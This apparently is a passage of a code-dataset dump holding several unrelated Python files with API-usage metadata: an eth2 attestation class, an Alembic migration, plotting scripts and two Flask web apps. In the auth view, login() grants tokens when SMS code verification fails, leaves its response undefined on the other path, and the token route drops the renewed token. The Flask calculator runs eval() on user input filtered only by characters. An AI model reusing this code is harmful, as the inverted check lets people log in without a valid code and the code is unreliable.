"usage_type": "call"}, {"api_name": "odoo.api", "line_number": 56, "usage_type": "name"}, {"api_name": "tweepy.API", "line_number": 56, "usage_type": "call"}, {"api_name": "odoo.api.get_status", "line_number": 60, "usage_type": "call"}, {"api_name": "odoo.api", "line_number": 60, "usage_type": "name"}, {"api_name": "tweepy.error", "line_number": 63, "usage_type": "attribute"}, {"api_name": "odoo.exceptions.UserError", "line_number": 64, "usage_type": "call"}, {"api_name": "odoo._", "line_number": 65, "usage_type": "call"}, {"api_name": "odoo.api.model", "line_number": 41, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 41, "usage_type": "name"}]} +{"seq_id": "274597294", "text": "from eth.constants import (\n ZERO_HASH32,\n)\n\nfrom eth_typing import (\n Hash32,\n)\n\nimport ssz\nfrom ssz.sedes import (\n bytes32,\n)\n\nfrom eth2.beacon.types.checkpoints import (\n Checkpoint,\n default_checkpoint,\n)\nfrom eth2.beacon.types.crosslinks import (\n Crosslink,\n default_crosslink,\n)\nfrom eth_utils import (\n humanize_hash,\n)\n\n\nclass AttestationData(ssz.Serializable):\n\n fields = [\n # LMD GHOST vote\n ('beacon_block_root', bytes32),\n\n # FFG vote\n ('source', Checkpoint),\n ('target', Checkpoint),\n\n # Crosslink vote\n ('crosslink', Crosslink),\n ]\n\n def __init__(self,\n beacon_block_root: 
Hash32=ZERO_HASH32,\n source: Checkpoint=default_checkpoint,\n target: Checkpoint=default_checkpoint,\n crosslink: Crosslink=default_crosslink) -> None:\n super().__init__(\n beacon_block_root=beacon_block_root,\n source=source,\n target=target,\n crosslink=crosslink,\n )\n\n def __str__(self) -> str:\n return (\n f\"beacon_block_root={humanize_hash(self.beacon_block_root)[2:10]}\"\n f\" source={self.source}\"\n f\" target={self.target}\"\n f\" | CL={self.crosslink}\"\n )\n\n\ndefault_attestation_data = AttestationData()\n", "sub_path": "eth2/beacon/types/attestation_data.py", "file_name": "attestation_data.py", "file_ext": "py", "file_size_in_byte": 1353, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "ssz.Serializable", "line_number": 27, "usage_type": "attribute"}, {"api_name": "ssz.sedes.bytes32", "line_number": 31, "usage_type": "name"}, {"api_name": "eth2.beacon.types.checkpoints.Checkpoint", "line_number": 34, "usage_type": "name"}, {"api_name": "eth2.beacon.types.checkpoints.Checkpoint", "line_number": 35, "usage_type": "name"}, {"api_name": "eth2.beacon.types.crosslinks.Crosslink", "line_number": 38, "usage_type": "name"}, {"api_name": "eth_typing.Hash32", "line_number": 42, "usage_type": "name"}, {"api_name": "eth2.beacon.types.checkpoints.Checkpoint", "line_number": 43, "usage_type": "name"}, {"api_name": "eth2.beacon.types.checkpoints.Checkpoint", "line_number": 44, "usage_type": "name"}, {"api_name": "eth2.beacon.types.crosslinks.Crosslink", "line_number": 45, "usage_type": "name"}, {"api_name": "eth.constants.ZERO_HASH32", "line_number": 42, "usage_type": "name"}, {"api_name": "eth2.beacon.types.checkpoints.default_checkpoint", "line_number": 43, "usage_type": "name"}, {"api_name": "eth2.beacon.types.checkpoints.default_checkpoint", "line_number": 44, "usage_type": "name"}, {"api_name": "eth2.beacon.types.crosslinks.default_crosslink", "line_number": 45, "usage_type": "name"}, {"api_name": "eth_utils.humanize_hash", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "573663762", "text": "#\n# Copyright (C) 2017 Red Hat, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"Create files events on existing datas\n\nRevision ID: ad1134e557de\nRevises: 61b68c2d66b5\nCreate Date: 2017-04-21 15:20:00.263439\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'ad1134e557de'\ndown_revision = '61b68c2d66b5'\nbranch_labels = None\ndepends_on = None\n\nfrom dci.db import models\n\nfrom alembic import op\nfrom sqlalchemy.dialects import postgresql as pg\nimport sqlalchemy as sa\nfrom sqlalchemy import sql\n\n\nFILES = sa.Table(\n 'files', sa.MetaData(),\n sa.Column('id', pg.UUID(as_uuid=True), primary_key=True))\n\n\ndef upgrade():\n db_conn = op.get_bind()\n\n query_all_files_ids = sql.select([FILES.c.id])\n all_files_ids = db_conn.execute(query_all_files_ids).fetchall()\n\n for file_id in all_files_ids:\n values = {'file_id': file_id['id'],\n 'action': models.FILES_CREATE}\n q_add_file_event = models.FILES_EVENTS.insert().values(**values)\n db_conn.execute(q_add_file_event)\n\n\ndef downgrade():\n pass\n", "sub_path": "dci/alembic/versions/ad1134e557de_create_files_events_on_existing_datas.py", "file_name": "ad1134e557de_create_files_events_on_existing_datas.py", "file_ext": "py", "file_size_in_byte": 1549, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sqlalchemy.Table", "line_number": 38, "usage_type": "call"}, {"api_name": "sqlalchemy.MetaData", "line_number": 39, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 40, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql.UUID", "line_number": 40, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql", "line_number": 40, "usage_type": "name"}, {"api_name": "alembic.op.get_bind", "line_number": 44, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 44, "usage_type": "name"}, {"api_name": "sqlalchemy.sql.select", "line_number": 46, "usage_type": "call"}, {"api_name": "sqlalchemy.sql", "line_number": 46, "usage_type": "name"}, {"api_name": "dci.db.models.FILES_CREATE", "line_number": 51, "usage_type": "attribute"}, {"api_name": "dci.db.models", "line_number": 51, "usage_type": "name"}, {"api_name": "dci.db.models.FILES_EVENTS.insert", "line_number": 52, "usage_type": "call"}, {"api_name": "dci.db.models.FILES_EVENTS", "line_number": 52, "usage_type": "attribute"}, {"api_name": "dci.db.models", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "377337690", "text": "import pandas as pd\nimport matplotlib.pyplot as plt\nimport xlrd\ndf=pd.read_excel(\"G:\\Excel\\second.xlsx\",\"Data\")\nx=df['CustomerID']\ny=df['Country']\n#Create bar graph\nplt.bar(x,y, label='Employee Data', color='red', align='center')\n#set x and y axis labels\nplt.xlabel('Customer ID')\nplt.ylabel('Country')\n#set company title\nplt.title('ABC Inc.')\n#show legend\nplt.legend()\nplt.show()\n", "sub_path": "Reading_Excel_Data.py", "file_name": "Reading_Excel_Data.py", "file_ext": "py", "file_size_in_byte": 381, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pandas.read_excel", "line_number": 4, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, 
"usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "282953600", "text": "import re\r\n\r\nimport numpy as np\r\nfrom flask import Flask, abort, render_template, request, jsonify\r\nfrom keras.models import load_model\r\nfrom model import encode_expression, decode_result, ALPHABET,\\\r\n OPERATIONS, MIN_NUMBER, MAX_NUMBER, MAX_EXPRESSION_LENGTH,\\\r\n MAX_NUMBER_IN_EXPRESSION\r\n\r\napp = Flask(__name__)\r\napp.config.from_object('config')\r\n\r\nmodel = load_model(app.config['MODEL_CHECKPOINT'])\r\nmodel._make_predict_function()\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n alphabet = ''.join(ALPHABET)\r\n escaped_alphabet = re.escape(''.join(ALPHABET))\r\n input_pattern = '^[{}]*$'.format(escaped_alphabet)\r\n return render_template(\r\n 'index.html',\r\n pattern=input_pattern,\r\n alphabet=alphabet,\r\n operations=', '.join(OPERATIONS),\r\n min_number=MIN_NUMBER,\r\n max_number=MAX_NUMBER,\r\n max_numbers_in_expression=MAX_NUMBER_IN_EXPRESSION,\r\n max_length=MAX_EXPRESSION_LENGTH\r\n )\r\n\r\n\r\n@app.route('/evaluate', methods=['POST'])\r\ndef evaluate():\r\n if not request.json or 'expression' not in request.json:\r\n abort(400)\r\n expression = request.json['expression']\r\n expression = ''.join(expression)\r\n validate_expression(expression)\r\n result = evalutate_using_model(expression)\r\n return jsonify({'result': '{}'.format(result)})\r\n\r\n\r\ndef validate_expression(expression):\r\n if set(expression) <= set(ALPHABET) and len(expression) <= MAX_EXPRESSION_LENGTH:\r\n try:\r\n eval(expression)\r\n return # OK\r\n except:\r\n pass\r\n abort(400)\r\n\r\n\r\ndef evalutate_using_model(expression):\r\n expression_vector = encode_expression(expression)\r\n # create a single-element batch\r\n expression_vector = np.expand_dims(expression_vector, axis=0)\r\n result_vector = model.predict(expression_vector)\r\n # get result from single-element batch\r\n return decode_result(result_vector[0])\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1957, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 10, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 13, "usage_type": "call"}, {"api_name": "model._make_predict_function", "line_number": 14, "usage_type": "call"}, {"api_name": "model.ALPHABET", "line_number": 19, "usage_type": "argument"}, {"api_name": "re.escape", "line_number": 20, "usage_type": "call"}, {"api_name": "model.ALPHABET", "line_number": 20, "usage_type": "argument"}, {"api_name": "flask.render_template", "line_number": 22, "usage_type": "call"}, {"api_name": "model.OPERATIONS", "line_number": 26, "usage_type": "argument"}, {"api_name": "model.MIN_NUMBER", "line_number": 27, "usage_type": "name"}, {"api_name": "model.MAX_NUMBER", "line_number": 28, 
"usage_type": "name"}, {"api_name": "model.MAX_NUMBER_IN_EXPRESSION", "line_number": 29, "usage_type": "name"}, {"api_name": "model.MAX_EXPRESSION_LENGTH", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 36, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 36, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 38, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 42, "usage_type": "call"}, {"api_name": "model.ALPHABET", "line_number": 46, "usage_type": "argument"}, {"api_name": "model.MAX_EXPRESSION_LENGTH", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 52, "usage_type": "call"}, {"api_name": "model.encode_expression", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 58, "usage_type": "call"}, {"api_name": "model.predict", "line_number": 59, "usage_type": "call"}, {"api_name": "model.decode_result", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "642640768", "text": "#!/usr/bin/env python\n#! -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MultipleLocator\nimport numpy as np\n\narq=open(\"./error_ccir_cp_edt.txt\",\"r\")\ndados=arq.readlines()\narq.close()\n\nx=[]\ny=[]\n\nfor i in range(0,len(dados)):\n\tx.append(float(dados[i][0:15]))\n\ty.append(float(dados[i][57:63]))\n\npaper_width=300.0\npaper_height=300.0\naxes_linewidth=2\naxes_label_paddding=10.0\naxes_label_fontsize=12\nmajor_ticks_size=15\nminor_ticks_size=8\nx_min=1990.0\nx_max=2012.0\nx_major_step=5.0\nx_minor_step=1.0\ny_min=-0.5\ny_max=1.0\ny_major_step=0.2\ny_minor_step=0.05\nplt.rcParams[\"axes.linewidth\"]=axes_linewidth\nplt.rcParams[\"xtick.major.size\"]=major_ticks_size\nplt.rcParams[\"xtick.minor.size\"]=minor_ticks_size\nplt.rcParams[\"ytick.major.size\"]=major_ticks_size\nplt.rcParams[\"ytick.minor.size\"]=minor_ticks_size\nplt.rcParams[\"xtick.major.pad\"]=axes_label_paddding\nplt.rcParams[\"xtick.minor.pad\"]=axes_label_paddding\nplt.rcParams[\"ytick.major.pad\"]=axes_label_paddding\nplt.rcParams[\"ytick.minor.pad\"]=axes_label_paddding\nplt.rcParams[\"xtick.labelsize\"]=axes_label_fontsize\nplt.rcParams[\"ytick.labelsize\"]=axes_label_fontsize\nplt.rcParams[\"lines.markeredgewidth\"]=axes_linewidth\nplt.rcParams[\"savefig.dpi\"]=300\nfig=plt.figure(num=1,figsize=(paper_width/25.4,paper_height/25.4))\nsub1=plt.subplot(1,1,1)\npts=plt.plot(x,y,'k.')\nplt.setp(pts,markersize=1.0,markeredgewidth=0.0)\nline0=plt.plot([x_min,x_max],[0.0,0.0],'r-')\nplt.setp(line0,linewidth=1.5)\nplt.axis([x_min,x_max,y_min,y_max])\nxmajors=MultipleLocator(x_major_step)\nxminors=MultipleLocator(x_minor_step)\nymajors=MultipleLocator(y_major_step)\nyminors=MultipleLocator(y_minor_step)\nsub1.xaxis.set_major_locator(xmajors)\nsub1.xaxis.set_minor_locator(xminors)\nsub1.yaxis.set_major_locator(ymajors)\nsub1.yaxis.set_minor_locator(yminors)\ntitulo=plt.suptitle(\"Cachoeira Pta., EDITED data, CCIR, (IRI - Ionosonde) / Ionosonde, foF2\")\nplt.setp(titulo,family=\"sans-serif\",size=16,weight=\"bold\",linespacing=2.0)\nrotulox=plt.xlabel(\"\\nYear\")\nplt.setp(rotulox,family=\"sans-serif\",size=14,weight=\"semibold\")\nrotuloy=plt.ylabel(\"(foF2_IRI - foF2_IONO) / 
foF2_IONO\\n\")\nplt.setp(rotuloy,family=\"sans-serif\",size=14,weight=\"semibold\")\nplt.grid(True)\nplt.savefig(\"./error_ccir_cp_edt.png\")#ou poderia mostrar direto \n#plt.show()\n", "sub_path": "2009_2010/06_Estudo_Matplotlib/Paulo Matplotlib/error_plot.py", "file_name": "error_plot.py", "file_ext": "py", "file_size_in_byte": 2286, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "matplotlib.pyplot.rcParams", "line_number": 34, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 35, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 36, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 37, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 38, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 39, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 40, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 41, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 42, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 43, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 44, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 45, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 46, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.axis", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.ticker.MultipleLocator", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.ticker.MultipleLocator", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.ticker.MultipleLocator", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.ticker.MultipleLocator", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.suptitle", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "583604768", "text": "from . import auth\nfrom flask import request, jsonify, g\nfrom ..jwt.sms import send_msg, verify_code\nfrom ..fields import *\nimport json\nfrom .. 
import db, redis_db\nfrom ..models import User\nfrom web.decorators import login_required\nfrom web.utils.constant import BACK_CODE\nfrom web.interfaces.base import ApiModel, ReqApi\nfrom log import logger\nfrom config import NOT_SIGN\n\n\n@auth.before_app_request\ndef before_request():\n    try:\n        context = request.get_data().decode(\"utf-8\")\n        json_data = json.loads(context)\n        req_json = ReqApi(json_data)\n        # verify the request signature\n        if req_json.verify_sign() or NOT_SIGN:\n            if \"token\" in req_json.keys():\n                user = User.verify_token(req_json.get(\"token\"))\n                g.user = user\n            else:\n                g.user = None\n\n            g.json = req_json\n        else:\n            return jsonify(ApiModel(RespCode=\"1001\", RespDesc=BACK_CODE[\"1001\"]).to_back())\n\n    except Exception as e:\n        logger.error(e)\n        g.json = None\n        g.user = None\n        return jsonify(ApiModel(RespCode=\"8002\", RespDesc=BACK_CODE[\"8002\"]).to_back())\n\n\n@auth.route('/login', methods=[\"POST\"])\ndef login():\n    \"\"\"\n    Return the RSA key, token and RefreshToken.\n\n    :return:\n    \"\"\"\n    json_data = g.json.r_json\n    if not verify_code(json_data[UserMobile], json_data[VeriCode]):\n        user = User.query.filter_by(user_mobile=g.json.get(UserMobile)).first()\n        if user:\n            token = user.get_token()\n            refresh_token = user.get_refresh_token()\n            key = redis_db.blpop(\"task:prodcons:queue\")[1].decode().split(\"&&&\")\n            user.add_rsa(key)\n            back_json = ApiModel(UserMobile=user.user_mobile, Money=user.account.money, Token=token,\n                                 RefreshToken=refresh_token, RSA=key[1])\n        else:\n            back_json = ApiModel()\n    return jsonify(back_json.to_back())\n\n\n@auth.route('/sendMessage', methods=[\"POST\"])\ndef sendMessage():\n    json_data = g.json.r_json\n    if UserMobile in json_data.keys():\n        result = send_msg(json_data[UserMobile])\n        if result is not None:\n            return jsonify(ApiModel().to_back())\n    return jsonify(ApiModel(RespDesc=\"send failed!\").to_back())\n\n\n@auth.route('/register', methods=[\"POST\"])\ndef register():\n    \"\"\"\n    UserMobile\n    UserPwd\n    VeriCode\n    :return:\n    \"\"\"\n    json_data = g.json.r_json\n    user = User.query.filter_by(user_mobile=json_data[UserMobile]).first()\n    if not user:\n        if verify_code(json_data[UserMobile], json_data[VeriCode]):\n            user = User(user_mobile=json_data[UserMobile], password=json_data[UserPwd])\n            db.session.add(user)\n            db.session.commit()\n            return jsonify(ApiModel(RespDesc=\"Register OK!\").to_back())\n        else:\n            return jsonify(ApiModel({\"RespCode\": \"1004\", \"RespDesc\": BACK_CODE[\"1004\"]}).to_back())\n    else:\n        return jsonify(ApiModel({\"RespCode\": \"1003\", \"RespDesc\": BACK_CODE[\"1003\"]}).to_back())\n\n\n@auth.route('/logout', methods=[\"POST\"])\n@login_required\ndef logout():\n    back = ApiModel(RespDesc=\"Logout Success\")\n    return jsonify(back.to_back())\n\n\n\n@auth.route('/token', methods=[\"POST\"])\ndef token():\n    \"\"\"\n    Renew the token.\n    refresh_token\n    :return: token\n    \"\"\"\n    json_data = g.json.r_json\n    back_json = ApiModel()\n    if RefreshToken in json_data.keys():\n        token = User.verify_refresh_token(json_data.get(RefreshToken))\n        if token:\n            back_json[Token] = token\n            return jsonify(ApiModel(RespCode=\"1006\", RespDesc=BACK_CODE[\"1006\"]).to_back())\n    return jsonify(ApiModel(RespCode=\"8003\", RespDesc=BACK_CODE[\"8003\"]).to_back())\n", "sub_path": "web/auth/view.py", "file_name": "view.py", "file_ext": "py", "file_size_in_byte": 3686, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.request.get_data", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 18, 
"usage_type": "name"}, {"api_name": "json.loads", "line_number": 19, "usage_type": "call"}, {"api_name": "web.interfaces.base.ReqApi", "line_number": 20, "usage_type": "call"}, {"api_name": "config.NOT_SIGN", "line_number": 22, "usage_type": "name"}, {"api_name": "models.User.verify_token", "line_number": 24, "usage_type": "call"}, {"api_name": "models.User", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.g.user", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.g.user", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.g.json", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 31, "usage_type": "call"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 31, "usage_type": "call"}, {"api_name": "web.utils.constant.BACK_CODE", "line_number": 31, "usage_type": "name"}, {"api_name": "log.logger.error", "line_number": 34, "usage_type": "call"}, {"api_name": "log.logger", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.g.json", "line_number": 35, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 35, "usage_type": "name"}, {"api_name": "flask.g.user", "line_number": 36, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 36, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 37, "usage_type": "call"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 37, "usage_type": "call"}, {"api_name": "web.utils.constant.BACK_CODE", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.g.json", "line_number": 47, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 47, "usage_type": "name"}, {"api_name": "jwt.sms.verify_code", "line_number": 48, "usage_type": "call"}, {"api_name": "models.User.query.filter_by", "line_number": 49, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 49, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 49, "usage_type": "name"}, {"api_name": "flask.g.json.get", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.g.json", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 49, "usage_type": "name"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 55, "usage_type": "call"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.g.json", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 64, "usage_type": "name"}, {"api_name": "jwt.sms.send_msg", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 68, "usage_type": "call"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 68, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 69, "usage_type": "call"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.g.json", "line_number": 80, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 80, "usage_type": "name"}, {"api_name": "models.User.query.filter_by", "line_number": 81, "usage_type": "call"}, {"api_name": "models.User.query", "line_number": 81, "usage_type": "attribute"}, {"api_name": "models.User", 
"line_number": 81, "usage_type": "name"}, {"api_name": "jwt.sms.verify_code", "line_number": 83, "usage_type": "call"}, {"api_name": "models.User", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 87, "usage_type": "call"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 89, "usage_type": "call"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 89, "usage_type": "call"}, {"api_name": "web.utils.constant.BACK_CODE", "line_number": 89, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 91, "usage_type": "call"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 91, "usage_type": "call"}, {"api_name": "web.utils.constant.BACK_CODE", "line_number": 91, "usage_type": "name"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 97, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 98, "usage_type": "call"}, {"api_name": "web.decorators.login_required", "line_number": 95, "usage_type": "name"}, {"api_name": "flask.g.json", "line_number": 109, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 109, "usage_type": "name"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 110, "usage_type": "call"}, {"api_name": "models.User.verify_refresh_token", "line_number": 112, "usage_type": "call"}, {"api_name": "models.User", "line_number": 112, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 115, "usage_type": "call"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 115, "usage_type": "call"}, {"api_name": "web.utils.constant.BACK_CODE", "line_number": 115, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 116, "usage_type": "call"}, {"api_name": "web.interfaces.base.ApiModel", "line_number": 116, "usage_type": "call"}, {"api_name": "web.utils.constant.BACK_CODE", "line_number": 116, "usage_type": "name"}]} +{"seq_id": "345796929", "text": "# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
